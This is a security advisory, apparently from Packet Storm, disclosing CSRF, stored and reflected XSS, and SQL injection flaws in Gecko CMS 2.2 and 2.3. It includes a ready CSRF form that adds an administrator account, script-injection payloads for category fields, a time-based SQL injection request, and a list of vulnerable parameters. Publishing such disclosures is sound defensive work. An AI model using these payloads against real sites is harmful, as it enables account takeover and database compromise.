Gecko CMS 2.2 / 2.3 CSRF / XSS / SQL Injection

2015-01-13T00:00:00
ID PACKETSTORM:129929
Type packetstorm
Reporter LiquidWorm
Modified 2015-01-13T00:00:00

Description

                                        
                                            `  
Gecko CMS 2.3 Multiple Vulnerabilities  
  
  
Vendor: JAKWEB  
Product web page: http://www.cmsgecko.com  
Affected version: 2.3 and 2.2  
  
Summary: Gecko CMS is the way to go, forget complicated, bloated  
and slow content management systems, Gecko CMS has been build to  
be intuitive, easy to use, extendable to almost anything, running  
on all standard web hosting (PHP and one MySQL database, Apache is  
a plus), browser compatibility and fast, super fast!  
  
Desc: Gecko CMS suffers from multiple vulnerabilities including  
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting  
and SQL Injection.  
  
Tested on: Apache/2  
PHP/5.4.36  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5222  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php  
  
  
27.12.2014  
  
---  
  
  
CSRF Add Admin:  
===============  
  
<html>  
<body>  
<form action="http://demo.cmsgecko.com/admin/index.php?p=user&sp=newuser" method="POST">  
<input type="hidden" name="jak_name" value="Testingus2" />  
<input type="hidden" name="jak_email" value="test2@test.test" />  
<input type="hidden" name="jak_username" value="Testusername2" />  
<input type="hidden" name="jak_usergroup" value="3" />  
<input type="hidden" name="jak_access" value="1" />  
<input type="hidden" name="jak_password" value="123123" />  
<input type="hidden" name="jak_confirm_password" value="123123" />  
<input type="hidden" name="save" value="" />  
<input type="submit" value="Submit form" />  
</form>  
</body>  
</html>  
  
usergroup 4 = moderator  
3 = administrator  
2 = member standard  
1 = guest  
5 = banned  
  
  
  
Stored XSS (params: jak_img, jak_name, jak_url):  
================================================  
  
POST http://demo.cmsgecko.com/admin/index.php?p=categories&sp=newcat HTTP/1.1  
  
jak_catparent 0  
jak_catparent2 0  
jak_footer 1  
jak_img "><script>alert(1);</script>  
jak_lcontent <p>test</p>  
jak_lcontent2   
jak_menu 1  
jak_name "><script>alert(2);</script>  
jak_name2   
jak_url "><script>alert(3);</script>  
jak_varname ZSL  
save   
  
  
  
SQL Injection (params: jak_delete_log[], ssp):  
==============================================  
  
POST /admin/index.php?p=logs&sp=s HTTP/1.1  
  
delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1  
  
--  
  
GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1  
  
  
  
Reflected XSS:  
==============  
  
/admin/index.php [horder%5B%5D parameter]  
/admin/index.php [jak_catid parameter]  
/admin/index.php [jak_content parameter]  
/admin/index.php [jak_css parameter]  
/admin/index.php [jak_delete_log%5B%5D parameter]  
/admin/index.php [jak_email parameter]  
/admin/index.php [jak_extfile parameter]  
/admin/index.php [jak_file parameter]  
/admin/index.php [jak_hookshow%5B%5D parameter]  
/admin/index.php [jak_img parameter]  
/admin/index.php [jak_javascript parameter]  
/admin/index.php [jak_lcontent parameter]  
/admin/index.php [jak_name parameter]  
/admin/index.php [jak_password parameter]  
/admin/index.php [jak_showcontact parameter]  
/admin/index.php [jak_tags parameter]  
/admin/index.php [jak_title parameter]  
/admin/index.php [jak_url parameter]  
/admin/index.php [jak_username parameter]  
/admin/index.php [real_hook_id%5B%5D parameter]  
/admin/index.php [sp parameter]  
/admin/index.php [sreal_plugin_id%5B%5D parameter]  
/admin/index.php [ssp parameter]  
/admin/index.php [sssp parameter]  
/js/editor/plugins/filemanager/dialog.php [editor parameter]  
/js/editor/plugins/filemanager/dialog.php [field_id parameter]  
/js/editor/plugins/filemanager/dialog.php [fldr parameter]  
/js/editor/plugins/filemanager/dialog.php [lang parameter]  
/js/editor/plugins/filemanager/dialog.php [popup parameter]  
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]  
/js/editor/plugins/filemanager/dialog.php [type parameter]  
`